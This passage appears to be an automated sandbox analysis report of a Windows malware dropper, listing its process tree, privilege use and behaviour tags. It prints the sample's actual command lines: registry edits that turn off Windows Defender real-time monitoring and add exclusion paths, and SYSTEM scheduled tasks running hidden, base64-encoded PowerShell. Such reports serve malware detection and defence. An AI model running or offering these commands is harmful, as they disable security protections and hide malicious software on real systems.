864 WMIC.exe Token: SeManageVolumePrivilege 864 WMIC.exe Token: SeDebugPrivilege 2556 powershell.EXE Token: SeDebugPrivilege 1812 powershell.exe Token: SeDebugPrivilege 1552 powershell.exe Token: SeAssignPrimaryTokenPrivilege 2128 WMIC.exe Token: SeIncreaseQuotaPrivilege 2128 WMIC.exe Token: SeSecurityPrivilege 2128 WMIC.exe Token: SeTakeOwnershipPrivilege 2128 WMIC.exe Token: SeLoadDriverPrivilege 2128 WMIC.exe Token: SeSystemtimePrivilege 2128 WMIC.exe Token: SeBackupPrivilege 2128 WMIC.exe Token: SeRestorePrivilege 2128 WMIC.exe Token: SeShutdownPrivilege 2128 WMIC.exe Token: SeSystemEnvironmentPrivilege 2128 WMIC.exe Token: SeUndockPrivilege 2128 WMIC.exe Token: SeManageVolumePrivilege 2128 WMIC.exe Token: SeDebugPrivilege 2408 powershell.exe Token: SeAssignPrimaryTokenPrivilege 832 WMIC.exe Token: SeIncreaseQuotaPrivilege 832 WMIC.exe Token: SeSecurityPrivilege 832 WMIC.exe Token: SeTakeOwnershipPrivilege 832 WMIC.exe Token: SeLoadDriverPrivilege 832 WMIC.exe Token: SeSystemtimePrivilege 832 WMIC.exe Token: SeBackupPrivilege 832 WMIC.exe Token: SeRestorePrivilege 832 WMIC.exe Token: SeShutdownPrivilege 832 WMIC.exe Token: SeSystemEnvironmentPrivilege 832 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2992 wrote to memory of 1228 2992 9c073f373478de7ebfb0a1cf8021095ecb24e07e5e5870ae0ea6c03f71d4ef34.exe 28 PID 2992 wrote to memory of 1228 2992 9c073f373478de7ebfb0a1cf8021095ecb24e07e5e5870ae0ea6c03f71d4ef34.exe 28 PID 2992 wrote to memory of 1228 2992 9c073f373478de7ebfb0a1cf8021095ecb24e07e5e5870ae0ea6c03f71d4ef34.exe 28 PID 2992 wrote to memory of 1228 2992 9c073f373478de7ebfb0a1cf8021095ecb24e07e5e5870ae0ea6c03f71d4ef34.exe 28 PID 2992 wrote to memory of 1228 2992 9c073f373478de7ebfb0a1cf8021095ecb24e07e5e5870ae0ea6c03f71d4ef34.exe 28 PID 2992 wrote to memory of 1228 2992 9c073f373478de7ebfb0a1cf8021095ecb24e07e5e5870ae0ea6c03f71d4ef34.exe 28 PID 2992 wrote to memory of 1228 2992 9c073f373478de7ebfb0a1cf8021095ecb24e07e5e5870ae0ea6c03f71d4ef34.exe 28 PID 1228 wrote to memory of 2696 1228 Install.exe 29 PID 1228 wrote to memory of 2696 1228 Install.exe 29 PID 1228 wrote to memory of 2696 1228 Install.exe 29 PID 1228 wrote to memory of 2696 1228 Install.exe 29 PID 1228 wrote to memory of 2696 1228 Install.exe 29 PID 1228 wrote to memory of 2696 1228 Install.exe 29 PID 1228 wrote to memory of 2696 1228 Install.exe 29 PID 2696 wrote to memory of 2776 2696 Install.exe 30 PID 2696 wrote to memory of 2776 2696 Install.exe 30 PID 2696 wrote to memory of 2776 2696 Install.exe 30 PID 2696 wrote to memory of 2776 2696 Install.exe 30 PID 2696 wrote to memory of 2776 2696 Install.exe 30 PID 2696 wrote to memory of 2776 2696 Install.exe 30 PID 2696 wrote to memory of 2776 2696 Install.exe 30 PID 2776 wrote to memory of 2948 2776 cmd.exe 32 PID 2776 wrote to memory of 2948 2776 cmd.exe 32 PID 2776 wrote to memory of 2948 2776 cmd.exe 32 PID 2776 wrote to memory of 2948 2776 cmd.exe 32 PID 2776 wrote to memory of 2948 2776 cmd.exe 32 PID 2776 wrote to memory of 2948 2776 cmd.exe 32 PID 2776 wrote to memory of 2948 2776 cmd.exe 32 PID 2948 wrote to memory of 2260 2948 forfiles.exe 33 PID 2948 wrote to memory of 2260 2948 forfiles.exe 33 PID 2948 wrote to memory of 2260 2948 forfiles.exe 33 PID 2948 wrote to memory of 2260 2948 forfiles.exe 33 PID 2948 wrote to memory of 2260 2948 forfiles.exe 33 PID 2948 wrote to memory of 2260 2948 forfiles.exe 33 PID 2948 wrote to memory of 2260 2948 forfiles.exe 33 PID 2260 wrote to memory of 2620 2260 cmd.exe 34 PID 2260 wrote to memory of 2620 2260 cmd.exe 34 PID 2260 wrote to memory of 2620 2260 cmd.exe 34 PID 2260 wrote to memory of 2620 2260 cmd.exe 34 PID 2260 wrote to memory of 2620 2260 cmd.exe 34 PID 2260 wrote to memory of 2620 2260 cmd.exe 34 PID 2260 wrote to memory of 2620 2260 cmd.exe 34 PID 2776 wrote to memory of 1928 2776 cmd.exe 35 PID 2776 wrote to memory of 1928 2776 cmd.exe 35 PID 2776 wrote to memory of 1928 2776 cmd.exe 35 PID 2776 wrote to memory of 1928 2776 cmd.exe 35 PID 2776 wrote to memory of 1928 2776 cmd.exe 35 PID 2776 wrote to memory of 1928 2776 cmd.exe 35 PID 2776 wrote to memory of 1928 2776 cmd.exe 35 PID 1928 wrote to memory of 2784 1928 forfiles.exe 36 PID 1928 wrote to memory of 2784 1928 forfiles.exe 36 PID 1928 wrote to memory of 2784 1928 forfiles.exe 36 PID 1928 wrote to memory of 2784 1928 forfiles.exe 36 PID 1928 wrote to memory of 2784 1928 forfiles.exe 36 PID 1928 wrote to memory of 2784 1928 forfiles.exe 36 PID 1928 wrote to memory of 2784 1928 forfiles.exe 36 PID 2784 wrote to memory of 2832 2784 cmd.exe 37 PID 2784 wrote to memory of 2832 2784 cmd.exe 37 PID 2784 wrote to memory of 2832 2784 cmd.exe 37 PID 2784 wrote to memory of 2832 2784 cmd.exe 37 PID 2784 wrote to memory of 2832 2784 cmd.exe 37 PID 2784 wrote to memory of 2832 2784 cmd.exe 37 PID 2784 wrote to memory of 2832 2784 cmd.exe 37 PID 2776 wrote to memory of 2632 2776 cmd.exe 38
Processes
-
C:\Users\Admin\AppData\Local\Temp\9c073f373478de7ebfb0a1cf8021095ecb24e07e5e5870ae0ea6c03f71d4ef34.exe"C:\Users\Admin\AppData\Local\Temp\9c073f373478de7ebfb0a1cf8021095ecb24e07e5e5870ae0ea6c03f71d4ef34.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2992 -
C:\Users\Admin\AppData\Local\Temp\7zS23B6.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1228 -
C:\Users\Admin\AppData\Local\Temp\7zS2617.tmp\Install.exe.\Install.exe /hOBJRdidme "525403" /S3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:2696 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"4⤵
- Suspicious use of WriteProcessMemory
PID:2776 -
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"5⤵
- Suspicious use of WriteProcessMemory
PID:2948 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 66⤵
- Suspicious use of WriteProcessMemory
PID:2260 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 67⤵PID:2620
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"5⤵
- Suspicious use of WriteProcessMemory
PID:1928 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 66⤵
- Suspicious use of WriteProcessMemory
PID:2784 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 67⤵PID:2832
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"5⤵PID:2632
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 66⤵PID:2828
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 67⤵PID:2548
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"5⤵PID:2720
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 66⤵PID:2540
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 67⤵PID:2060
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"5⤵PID:2800
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force6⤵PID:2680
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force7⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2568 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force8⤵PID:2544
-
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"4⤵PID:3008
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True5⤵PID:3052
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3040 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
PID:756
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bLzeoVMxrLqUlFeJJd" /SC once /ST 23:19:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\AqxqdgaLLZTMdtrEC\zBUIVtcygSckkyZ\ubbKbcd.exe\" ks /kFYdidMhXr 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2604
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bLzeoVMxrLqUlFeJJd"4⤵PID:2000
-
C:\Windows\SysWOW64\cmd.exe/C schtasks /run /I /tn bLzeoVMxrLqUlFeJJd5⤵PID:2844
-
\??\c:\windows\SysWOW64\schtasks.exeschtasks /run /I /tn bLzeoVMxrLqUlFeJJd6⤵PID:2612
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2696 -s 5044⤵
- Loads dropped DLL
- Program crash
PID:1276
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {902DBD09-077D-4675-B227-6392DDD795C4} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:2756
-
C:\Users\Admin\AppData\Local\Temp\AqxqdgaLLZTMdtrEC\zBUIVtcygSckkyZ\ubbKbcd.exeC:\Users\Admin\AppData\Local\Temp\AqxqdgaLLZTMdtrEC\zBUIVtcygSckkyZ\ubbKbcd.exe ks /kFYdidMhXr 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1592 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵PID:1528
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"4⤵PID:2252
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵PID:1320
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 66⤵PID:2124
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"4⤵PID:2056
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵PID:2256
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 66⤵PID:2096
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"4⤵PID:2072
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵PID:2864
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 66⤵PID:1280
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"4⤵PID:1912
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵PID:1696
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 66⤵PID:2376
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"4⤵PID:2796
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵PID:2964
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2952 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force7⤵PID:776
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gJTOFcHMR" /SC once /ST 04:39:30 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:644
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gJTOFcHMR"3⤵PID:1812
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gJTOFcHMR"3⤵PID:1784
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵PID:2868
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
PID:2128
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵PID:1056
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
PID:1148
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gUvPpqhbR" /SC once /ST 14:47:31 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:888
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gUvPpqhbR"3⤵PID:2940
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gUvPpqhbR"3⤵PID:2528
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"3⤵PID:2680
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True4⤵PID:2820
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3068 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True6⤵
- Suspicious use of AdjustPrivilegeToken
PID:864
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\xWvzdveufkqfSjMY" /t REG_DWORD /d 0 /reg:323⤵PID:2716
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\xWvzdveufkqfSjMY" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1580
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\xWvzdveufkqfSjMY" /t REG_DWORD /d 0 /reg:643⤵PID:3048
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\xWvzdveufkqfSjMY" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2988
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\xWvzdveufkqfSjMY" /t REG_DWORD /d 0 /reg:323⤵PID:3024
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\xWvzdveufkqfSjMY" /t REG_DWORD /d 0 /reg:324⤵PID:1992
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\xWvzdveufkqfSjMY" /t REG_DWORD /d 0 /reg:643⤵PID:1968
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\xWvzdveufkqfSjMY" /t REG_DWORD /d 0 /reg:644⤵PID:2604
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\xWvzdveufkqfSjMY\hCejAlpn\zgbHibaXBAlIsNlS.wsf"3⤵PID:1628
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\xWvzdveufkqfSjMY\hCejAlpn\zgbHibaXBAlIsNlS.wsf"3⤵
- Modifies data under HKEY_USERS
PID:2844 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FtTPlVLhSaUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2724
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FtTPlVLhSaUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2564
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OOuPExCnaYTU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2124
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OOuPExCnaYTU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2256
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mpUBPkkqU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2088
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mpUBPkkqU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2076
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rHfQGqiujvxkYJuQWHR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2116
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rHfQGqiujvxkYJuQWHR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2952
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tQtOyvtwIjTyC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2084
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tQtOyvtwIjTyC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2132
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\HNIqBcslfBUMDlVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2944
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\HNIqBcslfBUMDlVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1652
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:836
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2392
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\AqxqdgaLLZTMdtrEC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1144
-
-
